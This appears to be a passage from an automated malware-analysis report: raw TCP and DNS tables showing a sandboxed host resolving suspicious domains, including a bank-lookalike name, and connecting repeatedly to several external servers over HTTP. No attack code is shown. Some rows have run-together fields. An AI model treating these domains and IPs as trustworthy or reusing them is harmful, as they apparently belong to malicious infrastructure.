Sep 3, 2024 12:47:05.845879078 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.850970030 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.851028919 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.851039886 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.851067066 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.851358891 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.851396084 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.931431055 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.931452990 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.931464911 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.931494951 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.931576967 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.931632996 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:06.724952936 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:07.744513988 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:07.749450922 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:07.749521017 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:07.757998943 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:07.763108969 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341888905 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341905117 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341914892 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341924906 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341936111 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341979980 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.341991901 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.342001915 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.342011929 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.342021942 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.342039108 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.342135906 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.347678900 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.347690105 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.347696066 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.347922087 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.425724030 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.425735950 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.425746918 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.425839901 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.426048040 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:08.426167011 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.428960085 CEST | 49753 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:08.437560081 CEST | 80 | 49753 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:13.662206888 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:13.668267965 CEST | 80 | 49754 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:13.668333054 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:13.681910038 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:13.686738968 CEST | 80 | 49754 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:14.122888088 CEST | 80 | 49754 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:14.122904062 CEST | 80 | 49754 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:14.122916937 CEST | 80 | 49754 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:14.122962952 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:14.123146057 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:15.194969893 CEST | 49754 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:16.212701082 CEST | 49755 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:16.217607021 CEST | 80 | 49755 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:16.217696905 CEST | 49755 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:16.228790045 CEST | 49755 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:16.233731985 CEST | 80 | 49755 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:16.668078899 CEST | 80 | 49755 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:16.668102980 CEST | 80 | 49755 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:16.668113947 CEST | 80 | 49755 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:16.668339968 CEST | 49755 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:17.740871906 CEST | 49755 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:18.758735895 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:18.765925884 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.767246962 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:18.779081106 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:18.786333084 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.786344051 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.786417961 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.786427021 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.786434889 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.788681030 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.788690090 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.788692951 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:18.788702965 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:19.220160961 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:19.220181942 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:19.220196009 CEST | 80 | 49756 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:19.220268011 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:19.220268011 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:20.287472963 CEST | 49756 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:21.312838078 CEST | 49757 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:21.317774057 CEST | 80 | 49757 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:21.317843914 CEST | 49757 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:21.326735973 CEST | 49757 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:47:21.331562996 CEST | 80 | 49757 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:47:21.773591995 CEST | 80 | 49757 | 199.59.243.226 | 192.168.2.4
                      Sep 3, 2024 12:47:21.773606062 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773613930 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773787022 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.776633978 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.784113884 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:34.931385994 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.938137054 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:34.938215017 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.948638916 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.953476906 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:36.459419966 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:36.507452965 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:37.479929924 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.486644030 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:37.486716032 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.507653952 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.512476921 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:39.022061110 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:39.071440935 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.041568995 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.047529936 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.047595024 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.059210062 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.069313049 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069322109 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069329977 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069338083 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069344997 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069351912 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069454908 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069462061 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069597960 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:41.568823099 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:41.615436077 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:42.589085102 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.594105959 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:42.597184896 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.604516029 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.609335899 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:44.466851950 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:44.469188929 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:46.990346909 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:46.991182089 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:49.555859089 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:49.555933952 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.345927954 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:52.345973969 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:52.346115112 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.377109051 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.382015944 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:48:05.516267061 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.521173000 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:05.521260023 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.540270090 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.545099974 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104298115 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104311943 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104367971 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:06.104393959 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104440928 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:07.056333065 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.073643923 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.078519106 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.078583002 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.091609955 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.096427917 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668709040 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668730021 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668741941 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668880939 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:09.601846933 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.619203091 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.823477983 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.823652029 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.834806919 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.839740992 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839751005 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839773893 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839884996 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839893103 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839900017 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839907885 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839915991 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839929104 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402501106 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402761936 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402820110 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:11.677735090 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.677788973 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:12.350225925 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.369194031 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.374124050 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.377382994 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.384850979 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.389842033 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979079008 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979094982 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979116917 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979130983 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979140997 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979150057 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979202986 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.979254961 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.984735012 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.989916086 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:19.013217926 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.018368006 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.021311998 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.030272007 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.035161018 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.457319021 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.457376957 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:20.541229963 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:20.546334982 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:21.558264971 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.563178062 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:21.563244104 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.576808929 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.581717968 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:22.027498960 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:22.027549028 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:23.084621906 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:23.089505911 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.103504896 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.182163954 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.182257891 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.193367004 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.198189974 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198292971 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198304892 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198396921 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198404074 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198410988 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198419094 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198436022 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198450089 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385535002 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385711908 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385797977 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.385917902 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.386236906 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.709758043 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.716099977 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:26.728446007 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.733407021 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:26.737345934 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.749244928 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.754097939 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189043999 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189202070 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189306974 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:27.192174911 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:27.196954966 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:32.792277098 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:32.797261000 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:32.797367096 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:32.814332008 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.115880966 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.164175987 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.164189100 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766237974 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766331911 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766376972 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.766406059 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766448975 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:34.319128990 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.338299990 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.345196009 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:35.345388889 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.355160952 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.361105919 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350646019 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350668907 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350677967 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350682020 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350755930 CEST4977180192.168.2.4218.247.68.184
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 3, 2024 12:46:02.973001003 CEST | 54339 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:46:03.273441076 CEST | 53 | 54339 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:46:18.822684050 CEST | 61736 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:46:19.134821892 CEST | 53 | 61736 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:46:32.259215117 CEST | 61548 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:46:32.696712017 CEST | 53 | 61548 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:46:46.463182926 CEST | 61703 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:46:59.981013060 CEST | 54768 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:47:00.013551950 CEST | 53 | 54768 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:47:13.448673964 CEST | 56609 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:47:13.659240961 CEST | 53 | 56609 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:47:26.795118093 CEST | 57509 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:47:26.805310965 CEST | 53 | 57509 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:47:34.870033026 CEST | 51545 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:47:34.928621054 CEST | 53 | 51545 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:47:57.386573076 CEST | 55009 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:47:57.401392937 CEST | 53 | 55009 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:48:05.465250015 CEST | 61404 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:48:05.513112068 CEST | 53 | 61404 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:48:18.997231007 CEST | 52983 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:48:19.006894112 CEST | 53 | 52983 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 12:48:32.197731972 CEST | 61287 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 12:48:32.770678997 CEST | 53 | 61287 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 3, 2024 12:46:02.973001003 CEST | 192.168.2.4 | 1.1.1.1 | 0x34e9 | Standard query (0) | www.clientebradesco.online | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:18.822684050 CEST | 192.168.2.4 | 1.1.1.1 | 0x41a6 | Standard query (0) | www.myim.cloud | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:32.259215117 CEST | 192.168.2.4 | 1.1.1.1 | 0xcce2 | Standard query (0) | www.d55dg.top | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:46.463182926 CEST | 192.168.2.4 | 1.1.1.1 | 0x426a | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:59.981013060 CEST | 192.168.2.4 | 1.1.1.1 | 0x9e80 | Standard query (0) | www.fineg.online | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:13.448673964 CEST | 192.168.2.4 | 1.1.1.1 | 0xe892 | Standard query (0) | www.asian-massage-us.xyz | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:26.795118093 CEST | 192.168.2.4 | 1.1.1.1 | 0x930 | Standard query (0) | www.thriveline.online | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:34.870033026 CEST | 192.168.2.4 | 1.1.1.1 | 0xa0f5 | Standard query (0) | www.aflaksokna.com | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:47:57.386573076 CEST | 192.168.2.4 | 1.1.1.1 | 0x46e0 | Standard query (0) | www.esistiliya.online | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:05.465250015 CEST | 192.168.2.4 | 1.1.1.1 | 0x59bc | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:18.997231007 CEST | 192.168.2.4 | 1.1.1.1 | 0x6806 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:48:32.197731972 CEST | 192.168.2.4 | 1.1.1.1 | 0x73bc | Standard query (0) | www.dfbio.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.33.2.79 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.33.30.197 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 45.56.79.23 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 96.126.123.244 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 12:46:03.273441076 CEST | 1.1.1.1 | 192.168.2.4 | 0x34e9 | No error (0) | www.clientebradesco.online | - | 72.14.185.43 | A (IP address) | IN (0x0001) | false
